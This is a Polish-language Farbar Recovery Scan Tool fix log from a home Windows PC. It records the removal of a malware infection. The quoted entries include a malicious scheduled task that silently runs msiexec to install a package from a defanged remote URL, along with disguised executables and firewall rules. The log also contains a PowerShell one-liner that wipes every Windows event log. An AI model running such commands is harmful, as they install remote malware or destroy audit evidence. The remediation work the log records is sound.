Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 11.03.2019
Uruchomiony przez joannas (13-03-2019 20:00:36) Run:1
Uruchomiony z C:\Users\joannas\Downloads
Załadowane profile: joannas (Dostępne profile: joannas)
Tryb startu: Normal
==============================================

fixlist - zawartość:
*****************
CloseProcesses:
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> Brak pliku
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => -> Brak pliku
ContextMenuHandlers1: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} => -> Brak pliku
ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} => -> Brak pliku
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> Brak pliku
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku
ContextMenuHandlers6: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} => -> Brak pliku
Task: {68FEAA01-3A47-4E4C-B55A-1685368B3150} - System32\Tasks\{3543EE5D-FE99-AD25-23F5-03742BD2251B} => "msiexec" /q /i hxxps://refreshnerer711rb.info/G5UinNOyp5.6zZ <==== UWAGA
Task: {ACACA2F2-8091-4146-B26F-4CA8CA18299D} - System32\Tasks\{54D55C0D-2609-A62F-A35D-C02F1C8F7189} => C:\Program Files (x86)\Common Files\INhrB.exe (Microsoft Windows -> Microsoft Corporation)
Task: {D0D2DFB7-2A38-4163-9F20-E25B09C5BCE2} - System32\Tasks\Microsoft\Windows\Google\GoogleUpdateTaskMachineUP => C:\WINDOWS\SysWOW64\Microsoft\Protect\S-1-91-36\RB_1.3.20.90.exe <==== UWAGA
FirewallRules: [{0A1FE4EE-7B27-4B07-AF31-6C95E78B3548}] => (Allow) C:\WINDOWS\SysWOW64\OYYwFQYdnix.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{5A1F1C2F-F3FE-4C89-A0AC-1E4D6972C887}] => (Allow) C:\Program Files (x86)\Common Files\INhrB.exe (Microsoft Windows -> Microsoft Corporation)
C:\Program Files (x86)\Common Files\INhrB.exe
C:\WINDOWS\SysWOW64\OYYwFQYdnix.exe
FirewallRules: [{64503A19-D801-4A3B-80ED-4916B76F6D5E}] => (Allow) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHost.exe Brak pliku
FirewallRules: [{0590994E-2B06-4CFF-89E8-0D5AE7939375}] => (Allow) C:\Program Files (x86)\Common Files\Mcafee\MMSSHost\MMSSHost.exe Brak pliku
FirewallRules: [TCP Query User{CF495584-0657-43CB-B826-656336E9242E}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe] => (Allow) C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe Brak pliku
FirewallRules: [UDP Query User{0F180A3F-AF47-4AAF-BB09-219B34B7451A}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe] => (Allow) C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe Brak pliku
1601-01-03 21:26 - 1601-01-03 21:26 - 000060416 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\INhrB.exe
1601-01-03 21:26 - 1601-01-03 21:26 - 000178688 ____N (Microsoft Corporation) C:\Users\joannas\AppData\Local\ieauOreoYaK.exe
2019-03-13 10:09 - 2019-03-13 10:09 - 000000003 _____ () C:\Users\joannas\AppData\Local\wbem.ini
HKU\S-1-5-21-854575094-164889968-2061861544-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://mail.ru/cnt/10445?gp=834423
SearchScopes: HKU\S-1-5-21-854575094-164889968-2061861544-1002 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxps://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7BFF4B9E31-DD93-4183-8168-740E7AF4C5A8%7D&gp=811610
SearchScopes: HKU\S-1-5-21-854575094-164889968-2061861544-1002 -> {97F86C3D-A5E8-482E-BF0C-5080B7E20233} URL =
SearchScopes: HKU\S-1-5-21-854575094-164889968-2061861544-1002 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxps://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7BFF4B9E31-DD93-4183-8168-740E7AF4C5A8%7D&gp=811610
BHO-x32: Search@Mail.Ru -> {8E8F97CD-60B5-456F-A201-73065652D099} -> C:\Users\joannas\AppData\Local\Mail.Ru\Sputnik\ie_addon_dll.dll [2019-03-13] (LLC Mail.Ru -> Mail.Ru)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~2\mcafee\SITEAD~1\mcieplg.dll Brak pliku
2019-03-13 10:09 - 2019-03-13 10:22 - 000000000 ____D C:\ProgramData\localNETService
2019-03-13 10:09 - 2019-03-13 10:14 - 000000000 ____D C:\Users\joannas\AppData\Local\Mail.Ru
2019-03-13 10:09 - 2019-03-13 10:09 - 000000000 ____D C:\ProgramData\Mail.Ru
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
S3 mfeavfk04; \Device\mfeavfk04.sys [X]
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
EmptyTemp:
*****************

Procesy zostały pomyślnie zamknięte.
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\7-Zip => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} => nie znaleziono
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\ANotepad++64 => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{B298D29A-A6ED-11DE-BA8C-A68E55D89593} => nie znaleziono
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\BriefcaseMenu => pomyślnie usunięto
"HKLM\Software\Classes\CLSID\{85BBD920-42A0-1069-A2E4-08002B30309D}" => pomyślnie usunięto
HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\{4A7C4306-57E0-4C0C-83A9-78C1528F618C} => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{4A7C4306-57E0-4C0C-83A9-78C1528F618C} => nie znaleziono
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\7-Zip => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} => nie znaleziono
HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => nie znaleziono
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\BriefcaseMenu => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{85BBD920-42A0-1069-A2E4-08002B30309D} => nie znaleziono
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{68FEAA01-3A47-4E4C-B55A-1685368B3150}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{68FEAA01-3A47-4E4C-B55A-1685368B3150}" => pomyślnie usunięto
C:\WINDOWS\System32\Tasks\{3543EE5D-FE99-AD25-23F5-03742BD2251B} => pomyślnie przeniesiono
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{3543EE5D-FE99-AD25-23F5-03742BD2251B}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{ACACA2F2-8091-4146-B26F-4CA8CA18299D}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ACACA2F2-8091-4146-B26F-4CA8CA18299D}" => pomyślnie usunięto
C:\WINDOWS\System32\Tasks\{54D55C0D-2609-A62F-A35D-C02F1C8F7189} => pomyślnie przeniesiono
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{54D55C0D-2609-A62F-A35D-C02F1C8F7189}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D0D2DFB7-2A38-4163-9F20-E25B09C5BCE2}" => pomyślnie usunięto
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D0D2DFB7-2A38-4163-9F20-E25B09C5BCE2}" => pomyślnie usunięto
C:\WINDOWS\System32\Tasks\Microsoft\Windows\Google\GoogleUpdateTaskMachineUP => pomyślnie przeniesiono
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Google\GoogleUpdateTaskMachineUP" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0A1FE4EE-7B27-4B07-AF31-6C95E78B3548}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{5A1F1C2F-F3FE-4C89-A0AC-1E4D6972C887}" => pomyślnie usunięto
C:\Program Files (x86)\Common Files\INhrB.exe => pomyślnie przeniesiono
C:\WINDOWS\SysWOW64\OYYwFQYdnix.exe => pomyślnie przeniesiono
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{64503A19-D801-4A3B-80ED-4916B76F6D5E}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0590994E-2B06-4CFF-89E8-0D5AE7939375}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{CF495584-0657-43CB-B826-656336E9242E}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{0F180A3F-AF47-4AAF-BB09-219B34B7451A}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe" => pomyślnie usunięto
"C:\Program Files (x86)\Common Files\INhrB.exe" => nie znaleziono
C:\Users\joannas\AppData\Local\ieauOreoYaK.exe => pomyślnie przeniesiono
C:\Users\joannas\AppData\Local\wbem.ini => pomyślnie przeniesiono
HKU\S-1-5-21-854575094-164889968-2061861544-1002\Software\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono
"HKU\S-1-5-21-854575094-164889968-2061861544-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => pomyślnie usunięto
HKU\S-1-5-21-854575094-164889968-2061861544-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{97F86C3D-A5E8-482E-BF0C-5080B7E20233} => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{97F86C3D-A5E8-482E-BF0C-5080B7E20233} => nie znaleziono
HKU\S-1-5-21-854575094-164889968-2061861544-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} => nie znaleziono
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E8F97CD-60B5-456F-A201-73065652D099} => pomyślnie usunięto
HKLM\Software\Wow6432Node\Classes\CLSID\{8E8F97CD-60B5-456F-A201-73065652D099} => pomyślnie usunięto
HKLM\Software\Classes\PROTOCOLS\Handler\sacore => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{5513F07E-936B-4E52-9B00-067394E91CC5} => pomyślnie usunięto
C:\ProgramData\localNETService => pomyślnie przeniesiono
C:\Users\joannas\AppData\Local\Mail.Ru => pomyślnie przeniesiono
C:\ProgramData\Mail.Ru => pomyślnie przeniesiono
HKLM\SOFTWARE\Google\Chrome\Extensions\fheoggkfdfchfphceeifdbepaooicaho => pomyślnie usunięto
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\fheoggkfdfchfphceeifdbepaooicaho => pomyślnie usunięto
HKLM\System\CurrentControlSet\Services\mfeavfk04 => pomyślnie usunięto
mfeavfk04 => serwis pomyślnie usunięto

========= wevtutil el | Foreach-Object {wevtutil cl "$_"} =========

========= Koniec Powershell: =========

=========== EmptyTemp: ==========

BITS transfer queue => 9199616 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 881544853 B
Java, Flash, Steam htmlcache => 1568 B
Windows/system/drivers => 733723 B
Edge => 6036248 B
Chrome => 0 B
Firefox => 946688712 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 6656 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 12732255 B
systemprofile32 => 0 B
LocalService => 48150 B
LocalService => 0 B
NetworkService => 52568 B
NetworkService => 0 B
joannas => 108308419 B

RecycleBin => 0 B
EmptyTemp: => 1.8 GB danych tymczasowych Usunięto.

================================

System wymagał restartu.

==== Koniec Fixlog 20:02:18 ====